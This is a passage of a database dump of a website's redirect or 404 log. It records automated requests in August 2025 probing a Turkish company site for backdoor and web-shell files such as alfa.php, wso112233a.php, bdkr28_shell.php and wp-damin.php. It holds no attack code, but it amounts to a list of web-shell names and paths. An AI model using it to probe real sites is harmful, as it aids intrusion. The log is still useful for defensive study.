00:00:00',301),(44489,'http://3s-technologies.com.tr/tr/admin/themes.php',NULL,'','',1,0,'2025-08-09 15:27:17','0000-00-00 00:00:00',301),(44490,'http://3s-technologies.com.tr/tr/admin/buy.php',NULL,'','',1,0,'2025-08-09 15:27:18','0000-00-00 00:00:00',301),(44491,'http://3s-technologies.com.tr/tr/img/go.php',NULL,'','',1,0,'2025-08-09 15:27:19','0000-00-00 00:00:00',301),(44492,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/fucku.php',NULL,'','',1,0,'2025-08-09 15:27:20','0000-00-00 00:00:00',301),(44493,'http://3s-technologies.com.tr/tr/wp-admin/user/up.php',NULL,'','',1,0,'2025-08-09 15:27:21','0000-00-00 00:00:00',301),(44494,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/buy.php',NULL,'','',1,0,'2025-08-09 15:27:24','0000-00-00 00:00:00',301),(44495,'http://3s-technologies.com.tr/tr/wp-admin/network/webadmin.php',NULL,'','',1,0,'2025-08-09 15:27:25','0000-00-00 00:00:00',301),(44496,'http://3s-technologies.com.tr/tr/wp-includes/goat1.php',NULL,'','',1,0,'2025-08-09 15:27:26','0000-00-00 00:00:00',301),(44497,'http://3s-technologies.com.tr/tr/uploads/readme.php',NULL,'','',1,0,'2025-08-09 15:27:27','0000-00-00 00:00:00',301),(44498,'http://3s-technologies.com.tr/tr/js/mar.php',NULL,'','',1,0,'2025-08-09 15:27:28','0000-00-00 00:00:00',301),(44499,'http://3s-technologies.com.tr/tr/js/f35.php',NULL,'','',1,0,'2025-08-09 15:27:29','0000-00-00 00:00:00',301),(44500,'http://3s-technologies.com.tr/tr/js/0x.php',NULL,'','',1,0,'2025-08-09 15:27:30','0000-00-00 00:00:00',301),(44501,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/log.php',NULL,'','',1,0,'2025-08-09 15:27:31','0000-00-00 00:00:00',301),(44502,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/install.php',NULL,'','',1,0,'2025-08-09 15:27:32','0000-00-00 00:00:00',301),(44503,'http://3s-technologies.com.tr/tr/wp-content/themes/setup-config.php',NULL,'','',1,0,'2025-08-09 15:27:33','0000-00-00 00:00:00',301),(44504,'http://3s-technologies.com.tr/tr/function/alfa.php',NULL,'','',1,0,'2025-08-09 15:27:34','0000-00-00 00:00:00',301),(44505,'http://3s-technologies.com.tr/tr/images/edit-tags.php',NULL,'','',1,0,'2025-08-09 15:27:35','0000-00-00 00:00:00',301),(44506,'http://3s-technologies.com.tr/tr/wp-content/plugins/upload.php',NULL,'','',1,0,'2025-08-09 15:27:36','0000-00-00 00:00:00',301),(44507,'http://3s-technologies.com.tr/tr/wp-content/upgrade/wp-damin.php',NULL,'','',1,0,'2025-08-09 15:27:37','0000-00-00 00:00:00',301),(44508,'http://3s-technologies.com.tr/tr/wp-admin/maint/class.php',NULL,'','',1,0,'2025-08-09 15:27:38','0000-00-00 00:00:00',301),(44509,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/test.php',NULL,'','',1,0,'2025-08-09 15:27:39','0000-00-00 00:00:00',301),(44510,'http://3s-technologies.com.tr/tr/wp-admin/network/media.php.infected.php',NULL,'','',1,0,'2025-08-09 15:27:39','0000-00-00 00:00:00',301),(44511,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/ben.php',NULL,'','',1,0,'2025-08-09 15:27:40','0000-00-00 00:00:00',301),(44512,'http://3s-technologies.com.tr/tr/wp-includes/ixr/dropdown.php',NULL,'','',1,0,'2025-08-09 15:27:41','0000-00-00 00:00:00',301),(44513,'http://3s-technologies.com.tr/tr/wp-includes/js/as.php',NULL,'','',1,0,'2025-08-09 15:27:42','0000-00-00 00:00:00',301),(44514,'http://3s-technologies.com.tr/tr/wp-includes/text/item.php',NULL,'','',1,0,'2025-08-09 15:27:43','0000-00-00 00:00:00',301),(44515,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/wp-conflg.php',NULL,'','',1,0,'2025-08-09 15:27:44','0000-00-00 00:00:00',301),(44516,'http://3s-technologies.com.tr/tr/about/core.php',NULL,'','',1,0,'2025-08-09 15:27:45','0000-00-00 00:00:00',301),(44517,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/fm.php',NULL,'','',1,0,'2025-08-09 15:27:48','0000-00-00 00:00:00',301),(44518,'http://3s-technologies.com.tr/tr/wp-includes/widgets/lock360.php',NULL,'','',1,0,'2025-08-09 15:27:48','0000-00-00 00:00:00',301),(44519,'https://www.3s-technologies.com.tr/tr/cdn-cgi/image/width=4000,format=auto/http:/images.ctfassets.net/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://www.3s-technologies.com.tr/cdn-cgi/image/width=4000,format=auto/http://images.ctfassets.net/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',7,0,'2025-08-09 16:23:40','0000-00-00 00:00:00',301),(44520,'http://3s-technologies.com.tr/tr/wp-admin/images/download.php',NULL,'','',4,0,'2025-08-10 02:14:37','0000-00-00 00:00:00',301),(44521,'http://3s-technologies.com.tr/tr/files/fileupload.php',NULL,'','',3,0,'2025-08-10 02:14:38','0000-00-00 00:00:00',301),(44522,'http://3s-technologies.com.tr/tr/wp-includes/id3/el.php',NULL,'','',6,0,'2025-08-10 02:14:38','0000-00-00 00:00:00',301),(44523,'http://3s-technologies.com.tr/tr/uploads/af32.php',NULL,'','',5,0,'2025-08-10 02:14:39','0000-00-00 00:00:00',301),(44524,'http://3s-technologies.com.tr/tr/wp-includes/we2.php',NULL,'','',4,0,'2025-08-10 02:14:40','0000-00-00 00:00:00',301),(44525,'http://3s-technologies.com.tr/tr/wp-includes/click.php',NULL,'','',3,0,'2025-08-10 02:14:41','0000-00-00 00:00:00',301),(44526,'http://3s-technologies.com.tr/tr/d2.php',NULL,'','',35,0,'2025-08-10 02:14:44','0000-00-00 00:00:00',301),(44527,'http://3s-technologies.com.tr/tr/wp-includes/js/customize-selective-refresh.js',NULL,'','',1,0,'2025-08-10 20:59:22','0000-00-00 00:00:00',301),(44528,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-network-cron.php',NULL,'','',4,0,'2025-08-10 20:59:24','0000-00-00 00:00:00',301),(44529,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/xboom.php',NULL,'','',4,0,'2025-08-10 20:59:27','0000-00-00 00:00:00',301),(44530,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/browser.php',NULL,'','',5,0,'2025-08-10 20:59:28','0000-00-00 00:00:00',301),(44531,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-css.php',NULL,'','',2,0,'2025-08-10 20:59:31','0000-00-00 00:00:00',301),(44532,'http://3s-technologies.com.tr/tr/uploads/site2.php',NULL,'','',2,0,'2025-08-10 20:59:34','0000-00-00 00:00:00',301),(44533,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-conflg.php',NULL,'','',46,0,'2025-08-10 20:59:39','0000-00-00 00:00:00',301),(44534,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/zip.php',NULL,'','',3,0,'2025-08-10 20:59:41','0000-00-00 00:00:00',301),(44535,'http://3s-technologies.com.tr/tr/arig.php',NULL,'','',8,0,'2025-08-10 20:59:42','0000-00-00 00:00:00',301),(44536,'http://3s-technologies.com.tr/tr/wp-includes/js/admin.php',NULL,'','',3,0,'2025-08-10 20:59:45','0000-00-00 00:00:00',301),(44537,'http://3s-technologies.com.tr/tr/wp-admin/images/lightspped.php',NULL,'','',4,0,'2025-08-10 20:59:50','0000-00-00 00:00:00',301),(44538,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-imagezoom/admin/index.php',NULL,'','',1,0,'2025-08-10 20:59:54','0000-00-00 00:00:00',301),(44539,'http://3s-technologies.com.tr/tr/uploads/fungsi.php',NULL,'','',1,0,'2025-08-10 20:59:55','0000-00-00 00:00:00',301),(44540,'http://3s-technologies.com.tr/tr/wp-admin/js/let.php',NULL,'','',3,0,'2025-08-10 20:59:56','0000-00-00 00:00:00',301),(44541,'http://3s-technologies.com.tr/tr/wso112233a.php',NULL,'','',3,0,'2025-08-10 20:59:57','0000-00-00 00:00:00',301),(44542,'http://3s-technologies.com.tr/tr/wp-admin/maint/siteone.php',NULL,'','',4,0,'2025-08-10 21:00:01','0000-00-00 00:00:00',301),(44543,'http://3s-technologies.com.tr/tr/wp-admin/includes/el.php',NULL,'','',2,0,'2025-08-10 21:00:02','0000-00-00 00:00:00',301),(44544,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-parser-frame-stat.php',NULL,'','',2,0,'2025-08-10 21:00:05','0000-00-00 00:00:00',301),(44545,'http://3s-technologies.com.tr/tr/wp-includes/css/babu.php',NULL,'','',3,0,'2025-08-10 21:00:07','0000-00-00 00:00:00',301),(44546,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/ff.php',NULL,'','',3,0,'2025-08-10 21:00:09','0000-00-00 00:00:00',301),(44547,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/upload.php',NULL,'','',2,0,'2025-08-10 21:00:15','0000-00-00 00:00:00',301),(44548,'http://3s-technologies.com.tr/tr/modules/functions.php',NULL,'','',1,0,'2025-08-10 21:00:16','0000-00-00 00:00:00',301),(44549,'http://3s-technologies.com.tr/tr/images/alumni_reg.php',NULL,'','',4,0,'2025-08-10 21:00:16','0000-00-00 00:00:00',301),(44550,'http://3s-technologies.com.tr/tr/products/about.php',NULL,'','',3,0,'2025-08-10 21:00:17','0000-00-00 00:00:00',301),(44551,'http://3s-technologies.com.tr/tr/files/icon.php',NULL,'','',3,0,'2025-08-10 21:00:18','0000-00-00 00:00:00',301),(44552,'http://3s-technologies.com.tr/tr/assets/css/index.php',NULL,'','',43,0,'2025-08-10 21:00:22','0000-00-00 00:00:00',301),(44553,'http://3s-technologies.com.tr/tr/wp-includes/hel.php',NULL,'','',2,0,'2025-08-10 21:00:31','0000-00-00 00:00:00',301),(44554,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/vzlateam.php',NULL,'','',2,0,'2025-08-10 21:00:32','0000-00-00 00:00:00',301),(44555,'http://3s-technologies.com.tr/tr/wp-includes/feed-rsss.php',NULL,'','',2,0,'2025-08-10 21:00:34','0000-00-00 00:00:00',301),(44556,'http://3s-technologies.com.tr/tr/zsec.php',NULL,'','',9,0,'2025-08-10 21:00:36','0000-00-00 00:00:00',301),(44557,'http://3s-technologies.com.tr/tr/.well-known/rest-api.php',NULL,'','',4,0,'2025-08-10 21:00:38','0000-00-00 00:00:00',301),(44558,'http://3s-technologies.com.tr/tr/wp-admin/maint/techl.php',NULL,'','',4,0,'2025-08-10 21:00:40','0000-00-00 00:00:00',301),(44559,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021/02/index.php',NULL,'','',44,0,'2025-08-10 21:00:44','0000-00-00 00:00:00',301),(44560,'http://3s-technologies.com.tr/tr/wp-includes/ixr/goto.php',NULL,'','',3,0,'2025-08-10 21:00:45','0000-00-00 00:00:00',301),(44561,'http://3s-technologies.com.tr/tr/wp-admin/js/pe9rsn.php',NULL,'','',3,0,'2025-08-10 21:00:46','0000-00-00 00:00:00',301),(44562,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-privacy-data-removal-requests-list-table-package.php',NULL,'','',2,0,'2025-08-10 21:00:49','0000-00-00 00:00:00',301),(44563,'http://3s-technologies.com.tr/tr/wp-includes/embed-database.php',NULL,'','',2,0,'2025-08-10 21:00:50','0000-00-00 00:00:00',301),(44564,'http://3s-technologies.com.tr/tr/.wp/index.php',NULL,'','',2,0,'2025-08-10 21:00:52','0000-00-00 00:00:00',301),(44565,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-feed-cache-transient-part.php',NULL,'','',2,0,'2025-08-10 21:00:52','0000-00-00 00:00:00',301),(44566,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/info.php',NULL,'','',1,0,'2025-08-10 21:00:55','0000-00-00 00:00:00',301),(44567,'http://3s-technologies.com.tr/tr/images/send.php',NULL,'','',1,0,'2025-08-10 21:00:56','0000-00-00 00:00:00',301),(44568,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/rz.php',NULL,'','',4,0,'2025-08-10 21:00:58','0000-00-00 00:00:00',301),(44569,'http://3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-face.php',NULL,'','',2,0,'2025-08-10 21:00:59','0000-00-00 00:00:00',301),(44570,'http://3s-technologies.com.tr/tr/wp-admin/includes/port.php',NULL,'','',3,0,'2025-08-10 21:01:02','0000-00-00 00:00:00',301),(44571,'http://3s-technologies.com.tr/tr/plugins/system/index.php',NULL,'','',1,0,'2025-08-10 21:01:03','0000-00-00 00:00:00',301),(44572,'http://3s-technologies.com.tr/tr/wp-includes/customize/class-wp-customize-date-time-control.php',NULL,'','',1,0,'2025-08-10 21:01:04','0000-00-00 00:00:00',301),(44573,'http://3s-technologies.com.tr/tr/uploads/bigdump.php',NULL,'','',12,0,'2025-08-10 21:01:06','0000-00-00 00:00:00',301),(44574,'http://3s-technologies.com.tr/tr/uploads/1337.php',NULL,'','',3,0,'2025-08-10 21:01:08','0000-00-00 00:00:00',301),(44575,'http://3s-technologies.com.tr/tr/wp-admin/includes/menu-cookie.php',NULL,'','',2,0,'2025-08-10 21:01:09','0000-00-00 00:00:00',301),(44576,'http://3s-technologies.com.tr/tr/contact/index.php',NULL,'','',1,0,'2025-08-10 21:01:10','0000-00-00 00:00:00',301),(44577,'http://3s-technologies.com.tr/tr/uploads/lyns.php',NULL,'','',2,0,'2025-08-10 21:01:13','0000-00-00 00:00:00',301),(44578,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/gmail.php',NULL,'','',3,0,'2025-08-10 21:01:17','0000-00-00 00:00:00',301),(44579,'http://3s-technologies.com.tr/tr/new/index.php',NULL,'','',3,0,'2025-08-10 21:01:21','0000-00-00 00:00:00',301),(44580,'http://3s-technologies.com.tr/tr/uploads/function.php',NULL,'','',1,0,'2025-08-10 21:01:26','0000-00-00 00:00:00',301),(44581,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/aurora (1).php',NULL,'','',2,0,'2025-08-10 21:01:28','0000-00-00 00:00:00',301),(44582,'http://3s-technologies.com.tr/tr/assets/css/admin.php',NULL,'','',1,0,'2025-08-10 21:01:29','0000-00-00 00:00:00',301),(44583,'http://3s-technologies.com.tr/tr/files/fopen.php',NULL,'','',4,0,'2025-08-10 21:01:32','0000-00-00 00:00:00',301),(44584,'http://3s-technologies.com.tr/tr/wp-admin/includes/bdkr28_shell.php',NULL,'','',2,0,'2025-08-10 21:01:33','0000-00-00 00:00:00',301),(44585,'http://3s-technologies.com.tr/tr/.well-known/save.php',NULL,'','',3,0,'2025-08-10 21:01:34','0000-00-00 00:00:00',301),(44586,'http://3s-technologies.com.tr/tr/drop/index.php',NULL,'','',1,0,'2025-08-10 21:01:38','0000-00-00 00:00:00',301),(44587,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/info.php',NULL,'','',3,0,'2025-08-10 21:01:43','0000-00-00 00:00:00',301),(44588,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-core-upgrader-first.php',NULL,'','',2,0,'2025-08-10 21:01:47','0000-00-00 00:00:00',301),(44589,'http://3s-technologies.com.tr/tr/uploads/wp-content/plugins/index.php',NULL,'','',1,0,'2025-08-10 21:01:55','0000-00-00 00:00:00',301),(44590,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-admins.php',NULL,'','',3,0,'2025-08-10 21:01:59','0000-00-00 00:00:00',301),(44591,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio-video.as.php',NULL,'','',3,0,'2025-08-10 21:02:04','0000-00-00 00:00:00',301),(44592,'http://3s-technologies.com.tr/tr/apis/pinfo.php',NULL,'','',1,0,'2025-08-11 04:24:28','0000-00-00 00:00:00',301),(44593,'http://3s-technologies.com.tr/tr/wp-content/plugins/yanierin/akc.php?p=',NULL,'','',1,0,'2025-08-11 04:24:38','0000-00-00 00:00:00',301),(44594,'http://3s-technologies.com.tr/tr/34.php',NULL,'','',3,0,'2025-08-11 04:25:42','0000-00-00 00:00:00',301),(44595,'http://www.3s-technologies.com.tr/en/contacts\n',NULL,'','',3,0,'2025-08-11 08:59:33','0000-00-00 00:00:00',301),(44596,'http://3s-technologies.com.tr/tr/doiconvs.php',NULL,'http://3s-technologies.com.tr//doiconvs.php','',6,0,'2025-08-11 12:13:26','0000-00-00 00:00:00',301),(44597,'http://3s-technologies.com.tr/tr/memberfuns.php',NULL,'http://3s-technologies.com.tr//memberfuns.php','',12,0,'2025-08-11 12:13:33','0000-00-00 00:00:00',301),(44598,'http://3s-technologies.com.tr/tr/deployment.php',NULL,'','',3,0,'2025-08-11 16:47:09','0000-00-00 00:00:00',301),(44599,'http://3s-technologies.com.tr/tr/shs.php',NULL,'','',5,0,'2025-08-11 16:47:11','0000-00-00 00:00:00',301),(44600,'http://3s-technologies.com.tr/tr/staging.php',NULL,'','',6,0,'2025-08-11 16:47:18','0000-00-00 00:00:00',301),(44601,'http://3s-technologies.com.tr/tr/faq.php',NULL,'','',24,0,'2025-08-11 16:47:19','0000-00-00 00:00:00',301),(44602,'http://3s-technologies.com.tr/tr/sr.php',NULL,'','',1,0,'2025-08-11 19:34:34','0000-00-00 00:00:00',301),(44603,'http://3s-technologies.com.tr/tr/white.php',NULL,'','',4,0,'2025-08-11 19:34:38','0000-00-00 00:00:00',301),(44604,'http://3s-technologies.com.tr/tr/navy.php',NULL,'','',1,0,'2025-08-11 19:34:40','0000-00-00 00:00:00',301),(44605,'http://3s-technologies.com.tr/tr/world.php',NULL,'','',2,0,'2025-08-11 19:34:40','0000-00-00 00:00:00',301),(44606,'http://3s-technologies.com.tr/tr/bless2.php',NULL,'','',19,0,'2025-08-11 22:20:09','0000-00-00 00:00:00',301),(44607,'http://3s-technologies.com.tr/tr/bless3.php',NULL,'','',23,0,'2025-08-11 22:20:10','0000-00-00 00:00:00',301),(44608,'http://3s-technologies.com.tr/tr/bless4.php',NULL,'','',15,0,'2025-08-11 22:20:10','0000-00-00 00:00:00',301),(44609,'http://3s-technologies.com.tr/tr/bless5.php',NULL,'','',68,0,'2025-08-11 22:20:11','0000-00-00 00:00:00',301),(44610,'http://3s-technologies.com.tr/tr/bless6.php',NULL,'','',5,0,'2025-08-11 22:20:12','0000-00-00 00:00:00',301),(44611,'http://3s-technologies.com.tr/tr/bless7.php',NULL,'','',2,0,'2025-08-11 22:20:13','0000-00-00 00:00:00',301),(44612,'http://3s-technologies.com.tr/tr/bless8.php',NULL,'','',2,0,'2025-08-11 22:20:14','0000-00-00 00:00:00',301),(44613,'http://3s-technologies.com.tr/tr/bless9.php',NULL,'','',2,0,'2025-08-11 22:20:15','0000-00-00 00:00:00',301),(44614,'http://3s-technologies.com.tr/tr/test/php-info.php',NULL,'','',2,0,'2025-08-12 06:09:06','0000-00-00 00:00:00',301),(44615,'http://3s-technologies.com.tr/tr/masfix.php',NULL,'','',2,0,'2025-08-12 14:48:34','0000-00-00 00:00:00',301),(44616,'http://3s-technologies.com.tr/tr/shell20250630.php',NULL,'','',10,0,'2025-08-12 14:48:35','0000-00-00 00:00:00',301),(44617,'http://3s-technologies.com.tr/tr/app/include/libs/sysplugins/smarty_internal_compile_qcache.php',NULL,'','',2,0,'2025-08-12 14:48:36','0000-00-00 00:00:00',301),(44618,'http://3s-technologies.com.tr/tr/update/manager.php',NULL,'','',1,0,'2025-08-12 20:25:37','0000-00-00 00:00:00',301),(44619,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/network.php',NULL,'','',1,0,'2025-08-12 20:25:38','0000-00-00 00:00:00',301),(44620,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/wp-damin.php',NULL,'','',1,0,'2025-08-12 20:25:39','0000-00-00 00:00:00',301),(44621,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/cong.php',NULL,'','',1,0,'2025-08-12 20:25:41','0000-00-00 00:00:00',301),(44622,'http://3s-technologies.com.tr/tr/wp-includes/js/atomlib.php',NULL,'','',1,0,'2025-08-12 20:25:42','0000-00-00 00:00:00',301),(44623,'http://3s-technologies.com.tr/tr/wp-admin/js/wp-2019.php',NULL,'','',1,0,'2025-08-12 20:25:42','0000-00-00 00:00:00',301),(44624,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/system_log.php',NULL,'','',1,0,'2025-08-12 20:25:43','0000-00-00 00:00:00',301),(44625,'http://3s-technologies.com.tr/tr/uploads/wp-login.php',NULL,'','',1,0,'2025-08-12 20:25:44','0000-00-00 00:00:00',301),(44626,'http://3s-technologies.com.tr/tr/wp-content/languages/alfa-rex.php',NULL,'','',1,0,'2025-08-12 20:25:45','0000-00-00 00:00:00',301),(44627,'http://3s-technologies.com.tr/tr/wp-includes/widgets/network.php',NULL,'','',1,0,'2025-08-12 20:25:46','0000-00-00 00:00:00',301),(44628,'http://3s-technologies.com.tr/tr/js/log.php',NULL,'','',1,0,'2025-08-12 20:25:47','0000-00-00 00:00:00',301),(44629,'http://3s-technologies.com.tr/tr/update/inputs.php',NULL,'','',1,0,'2025-08-12 20:25:47','0000-00-00 00:00:00',301),(44630,'http://3s-technologies.com.tr/tr/wp-includes/fonts/mail.php',NULL,'','',1,0,'2025-08-12 20:25:48','0000-00-00 00:00:00',301),(44631,'http://3s-technologies.com.tr/tr/wp-admin/includes/db.php?u',NULL,'','',1,0,'2025-08-12 20:25:49','0000-00-00 00:00:00',301),(44632,'http://3s-technologies.com.tr/tr/update/buy.php',NULL,'','',1,0,'2025-08-12 20:25:49','0000-00-00 00:00:00',301),(44633,'http://3s-technologies.com.tr/tr/wp-includes/js/fm.php',NULL,'','',1,0,'2025-08-12 20:25:50','0000-00-00 00:00:00',301),(44634,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/up.php',NULL,'','',1,0,'2025-08-12 20:25:51','0000-00-00 00:00:00',301),(44635,'http://3s-technologies.com.tr/tr/uploads/getid3s.php',NULL,'','',1,0,'2025-08-12 20:25:52','0000-00-00 00:00:00',301),(44636,'http://3s-technologies.com.tr/tr/uploads/mar.php',NULL,'','',1,0,'2025-08-12 20:25:52','0000-00-00 00:00:00',301),(44637,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/wp-damin.php',NULL,'','',1,0,'2025-08-12 20:25:53','0000-00-00 00:00:00',301),(44638,'http://3s-technologies.com.tr/tr/wp-includes/html-api/0x.php',NULL,'','',1,0,'2025-08-12 20:25:54','0000-00-00 00:00:00',301),(44639,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/cc.php',NULL,'','',1,0,'2025-08-12 20:25:54','0000-00-00 00:00:00',301),(44640,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/webadmin.php',NULL,'','',1,0,'2025-08-12 20:25:55','0000-00-00 00:00:00',301),(44641,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/upload.php',NULL,'','',1,0,'2025-08-12 20:25:56','0000-00-00 00:00:00',301),(44642,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/edit.php',NULL,'','',1,0,'2025-08-12 20:25:56','0000-00-00 00:00:00',301),(44643,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-2019.php',NULL,'','',1,0,'2025-08-12 20:25:58','0000-00-00 00:00:00',301),(44644,'http://3s-technologies.com.tr/tr/wp-includes/fonts/inputs.php',NULL,'','',1,0,'2025-08-12 20:26:00','0000-00-00 00:00:00',301),(44645,'http://3s-technologies.com.tr/tr/wp-includes/widgets/alfa.php',NULL,'','',1,0,'2025-08-12 20:26:01','0000-00-00 00:00:00',301),(44646,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/xp.php',NULL,'','',1,0,'2025-08-12 20:26:02','0000-00-00 00:00:00',301),(44647,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/item.php',NULL,'','',1,0,'2025-08-12 20:26:03','0000-00-00 00:00:00',301),(44648,'http://3s-technologies.com.tr/tr/js/about.php',NULL,'','',1,0,'2025-08-12 20:26:03','0000-00-00 00:00:00',301),(44649,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/gecko-litespeed.php',NULL,'','',1,0,'2025-08-12 20:26:04','0000-00-00 00:00:00',301),(44650,'http://3s-technologies.com.tr/tr/wp-content/wp-damin.php',NULL,'','',1,0,'2025-08-12 20:26:05','0000-00-00 00:00:00',301),(44651,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/setup-config.php',NULL,'','',1,0,'2025-08-12 20:26:05','0000-00-00 00:00:00',301),(44652,'http://3s-technologies.com.tr/tr/uploads/mail.php',NULL,'','',1,0,'2025-08-12 20:26:06','0000-00-00 00:00:00',301),(44653,'http://3s-technologies.com.tr/tr/wp-includes/js/hehe.php',NULL,'','',1,0,'2025-08-12 20:26:07','0000-00-00 00:00:00',301),(44654,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/wp-damin.php',NULL,'','',1,0,'2025-08-12 20:26:08','0000-00-00 00:00:00',301),(44655,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/up.php',NULL,'','',1,0,'2025-08-12 20:26:08','0000-00-00 00:00:00',301),(44656,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/file.php',NULL,'','',1,0,'2025-08-12 20:26:10','0000-00-00 00:00:00',301),(44657,'http://3s-technologies.com.tr/tr/wp-includes/js/mpvloi.php',NULL,'','',1,0,'2025-08-12 20:26:10','0000-00-00 00:00:00',301),(44658,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/wp-2019.php',NULL,'','',1,0,'2025-08-12 20:26:11','0000-00-00 00:00:00',301),(44659,'http://3s-technologies.com.tr/tr/wp-admin/user/up',NULL,'','',1,0,'2025-08-12 20:26:12','0000-00-00 00:00:00',301),(44660,'http://3s-technologies.com.tr/tr/wp-includes/html-api/link.php',NULL,'','',1,0,'2025-08-12 20:26:13','0000-00-00 00:00:00',301),(44661,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/up.php',NULL,'','',1,0,'2025-08-12 20:26:13','0000-00-00 00:00:00',301),(44662,'http://3s-technologies.com.tr/tr/function/test.php',NULL,'','',1,0,'2025-08-12 20:26:14','0000-00-00 00:00:00',301),(44663,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/xp.php',NULL,'','',1,0,'2025-08-12 20:26:15','0000-00-00 00:00:00',301),(44664,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/setup-config.php',NULL,'','',1,0,'2025-08-12 20:26:17','0000-00-00 00:00:00',301),(44665,'http://3s-technologies.com.tr/tr/wp-content/themes/simple.php',NULL,'','',1,0,'2025-08-12 20:26:18','0000-00-00 00:00:00',301),(44666,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/test.php',NULL,'','',1,0,'2025-08-12 20:26:18','0000-00-00 00:00:00',301),(44667,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/readme.php',NULL,'','',1,0,'2025-08-12 20:26:19','0000-00-00 00:00:00',301),(44668,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/bless.php',NULL,'','',1,0,'2025-08-12 20:26:20','0000-00-00 00:00:00',301),(44669,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/fm.php',NULL,'','',1,0,'2025-08-12 20:26:20','0000-00-00 00:00:00',301),(44670,'http://3s-technologies.com.tr/tr/wp-includes/widgets/goat1.php',NULL,'','',1,0,'2025-08-12 20:26:21','0000-00-00 00:00:00',301),(44671,'http://3s-technologies.com.tr/tr/wp-includes/fonts/makeasmtp.php',NULL,'','',1,0,'2025-08-12 20:26:22','0000-00-00 00:00:00',301),(44672,'http://3s-technologies.com.tr/tr/wp-includes/blocks/wp-damin.php',NULL,'','',1,0,'2025-08-12 20:26:22','0000-00-00 00:00:00',301),(44673,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/system_log.php',NULL,'','',1,0,'2025-08-12 20:26:23','0000-00-00 00:00:00',301),(44674,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/go.php',NULL,'','',1,0,'2025-08-12 20:26:24','0000-00-00 00:00:00',301),(44675,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/setup-config.php',NULL,'','',1,0,'2025-08-12 20:26:25','0000-00-00 00:00:00',301),(44676,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/getid3s.php',NULL,'','',1,0,'2025-08-12 20:26:27','0000-00-00 00:00:00',301),(44677,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/as.php',NULL,'','',2,0,'2025-08-12 20:26:28','0000-00-00 00:00:00',301),(44678,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/alfa.php',NULL,'','',1,0,'2025-08-12 20:26:29','0000-00-00 00:00:00',301),(44679,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/link.php',NULL,'','',1,0,'2025-08-12 20:26:31','0000-00-00 00:00:00',301),(44680,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/webadmin.php',NULL,'','',1,0,'2025-08-12 20:26:31','0000-00-00 00:00:00',301),(44681,'http://3s-technologies.com.tr/tr/wp-includes/pomo/file.php',NULL,'','',1,0,'2025-08-12 20:26:32','0000-00-00 00:00:00',301),(44682,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/cc.php',NULL,'','',1,0,'2025-08-12 20:26:33','0000-00-00 